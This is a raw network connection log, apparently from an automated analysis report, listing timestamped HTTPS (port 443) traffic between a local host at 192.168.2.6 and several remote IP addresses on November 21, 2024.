                                                                                                                                                                        Nov 21, 2024 10:37:34.788599968 CET49757443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:34.823544025 CET49757443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:34.823575020 CET44349757188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.231398106 CET4434975813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.253664970 CET49758443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:35.253681898 CET4434975813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.257925034 CET49758443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:35.257931948 CET4434975813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.573964119 CET4434976013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.574894905 CET49760443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:35.574933052 CET4434976013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.575192928 CET4434975913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.575361013 CET49760443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:35.575371027 CET4434976013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.576093912 CET49759443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:35.576114893 CET4434975913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.576473951 CET49759443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:35.576478004 CET4434975913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.667300940 CET4434975813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.667401075 CET4434975813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.667469978 CET49758443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:35.667722940 CET49758443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:35.667754889 CET4434975813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.667773008 CET49758443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:35.667782068 CET4434975813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.670810938 CET49765443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:35.670867920 CET4434976513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.671282053 CET49765443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:35.671437979 CET49765443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:35.671453953 CET4434976513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.700126886 CET4434976113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.702178001 CET49761443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:35.702198982 CET4434976113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.702704906 CET49761443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:35.702709913 CET4434976113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.888175964 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:35.888216019 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.888329029 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:35.888771057 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:35.888783932 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.905169010 CET4434976252.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.905267954 CET49762443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:37:35.906977892 CET49762443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:37:35.906990051 CET4434976252.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.907655001 CET4434976252.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:35.954675913 CET49762443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:37:36.005645037 CET4434976013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.005722046 CET4434976013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.005842924 CET49760443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.006146908 CET49760443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.006165981 CET4434976013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.014329910 CET49767443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.014386892 CET4434976713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.014461040 CET49767443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.014647961 CET49767443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.014666080 CET4434976713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.019392967 CET4434975913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.019578934 CET4434975913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.019648075 CET49759443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.026115894 CET49759443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.026149035 CET4434975913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.026161909 CET49759443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.026169062 CET4434975913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.047241926 CET49768443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.047276020 CET4434976813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.047333956 CET49768443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.047656059 CET49768443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.047671080 CET4434976813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.053540945 CET49762443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:37:36.099334955 CET4434976252.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.142607927 CET4434976113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.142868042 CET4434976113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.142927885 CET49761443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.143006086 CET49761443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.143022060 CET4434976113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.143032074 CET49761443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.143038034 CET4434976113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.145764112 CET49769443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.145797014 CET4434976913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.145890951 CET49769443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.146017075 CET49769443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.146040916 CET4434976913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.176749945 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:36.176776886 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.176845074 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:36.177452087 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:36.177464962 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.475660086 CET4434976313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.476391077 CET49763443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.476412058 CET4434976313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.476860046 CET49763443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.476866007 CET4434976313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.652400970 CET4434976252.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.652426958 CET4434976252.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.652436972 CET4434976252.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.652446985 CET4434976252.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.652473927 CET4434976252.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.652518988 CET49762443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:37:36.652543068 CET4434976252.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.652558088 CET49762443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:37:36.652585983 CET49762443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:37:36.679533005 CET4434976252.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.679620981 CET4434976252.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.679626942 CET49762443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:37:36.679673910 CET49762443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:37:36.679851055 CET49762443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:37:36.679866076 CET4434976252.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.928101063 CET4434976313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.928174019 CET4434976313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.928225994 CET49763443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.928482056 CET49763443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.928500891 CET4434976313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.928512096 CET49763443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.928518057 CET4434976313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.931292057 CET49771443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.931339025 CET4434977113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:36.931423903 CET49771443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.931610107 CET49771443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:36.931622028 CET4434977113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.191329956 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.191404104 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.192903042 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.192914963 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.193154097 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.218621969 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.219492912 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.219537020 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.219615936 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.219647884 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.219758987 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.219791889 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.219923019 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.219949961 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.220086098 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.220113993 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.220247984 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.220276117 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.220284939 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.220480919 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.220499039 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.263341904 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.263549089 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.263614893 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.263633013 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.307339907 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.307528019 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.307566881 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.307591915 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.351331949 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.351473093 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.392178059 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:37.392205000 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.522360086 CET4434976513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.523093939 CET49765443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:37.523144960 CET4434976513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.523544073 CET49765443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:37.523552895 CET4434976513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.703932047 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.794424057 CET4434976713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.794974089 CET49767443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:37.795010090 CET4434976713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.795497894 CET49767443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:37.795506001 CET4434976713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.843787909 CET4434976813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.844273090 CET49768443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:37.844290018 CET4434976813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.844754934 CET49768443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:37.844763994 CET4434976813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.975934029 CET4434976513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.976003885 CET4434976513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.976068974 CET49765443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:37.976294994 CET49765443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:37.976315975 CET4434976513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.976331949 CET49765443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:37.976339102 CET4434976513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.978874922 CET49772443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:37.978894949 CET4434977213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.979038000 CET49772443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:37.979226112 CET49772443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:37.979234934 CET4434977213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.994421005 CET4434976913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.994906902 CET49769443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:37.994923115 CET4434976913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:37.995412111 CET49769443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:37.995418072 CET4434976913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.027040005 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.027137995 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:38.028836012 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:38.028848886 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.029098034 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.030817986 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:38.030901909 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:38.030905962 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.031007051 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:38.071326017 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.270982027 CET4434976713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.271063089 CET4434976713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.271267891 CET49767443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.271341085 CET49767443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.271358967 CET4434976713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.271378994 CET49767443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.271387100 CET4434976713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.273901939 CET49773443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.273936987 CET4434977313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.274249077 CET49773443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.274380922 CET49773443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.274391890 CET4434977313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.313910961 CET4434976813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.313981056 CET4434976813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.314157009 CET49768443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.314878941 CET49768443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.314893007 CET4434976813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.317725897 CET49774443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.317759037 CET4434977413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.319295883 CET49774443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.319430113 CET49774443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.319449902 CET4434977413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.430459023 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.430598021 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.430640936 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:38.430994034 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:38.431009054 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.449217081 CET4434976913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.449286938 CET4434976913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.450362921 CET49769443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.450701952 CET49769443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.450701952 CET49769443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.450726986 CET4434976913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.450736046 CET4434976913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.453998089 CET49775443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.454066992 CET4434977513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.454150915 CET49775443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.454375982 CET49775443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.454389095 CET4434977513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.745682001 CET4434977113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.746206045 CET49771443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.746226072 CET4434977113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:38.746750116 CET49771443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:38.746756077 CET4434977113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:39.188600063 CET4434977113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:39.188755989 CET4434977113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:39.188843012 CET49771443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:39.189009905 CET49771443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:39.189009905 CET49771443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:39.189029932 CET4434977113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:39.189039946 CET4434977113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:39.192608118 CET49776443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:39.192641973 CET4434977613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:39.192784071 CET49776443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:39.192955017 CET49776443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:39.192969084 CET4434977613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:39.706047058 CET4434977213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:39.706538916 CET49772443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:39.706584930 CET4434977213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:39.706996918 CET49772443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:39.707004070 CET4434977213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.102992058 CET4434977413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.104470015 CET49774443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.104491949 CET4434977413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.104912043 CET49774443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.104922056 CET4434977413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.130291939 CET4434977313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.131616116 CET49773443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.131647110 CET4434977313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.132042885 CET49773443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.132050037 CET4434977313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.139774084 CET4434977213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.139842987 CET4434977213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.139898062 CET49772443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.140089035 CET49772443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.140105009 CET4434977213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.140116930 CET49772443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.140121937 CET4434977213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.143102884 CET49777443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.143141985 CET4434977713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.143193960 CET49777443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.147528887 CET49777443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.147547960 CET4434977713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.303968906 CET4434977513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.308443069 CET49775443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.308511972 CET4434977513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.308876038 CET49775443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.308897018 CET4434977513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.582596064 CET4434977313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.582689047 CET4434977313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.582773924 CET49773443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.582915068 CET49773443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.582948923 CET4434977313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.582967043 CET49773443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.582976103 CET4434977313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.585747957 CET49778443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.585793972 CET4434977813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.585897923 CET49778443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.586091042 CET49778443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.586105108 CET4434977813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.593019962 CET4434977413.107.246.60192.168.2.6
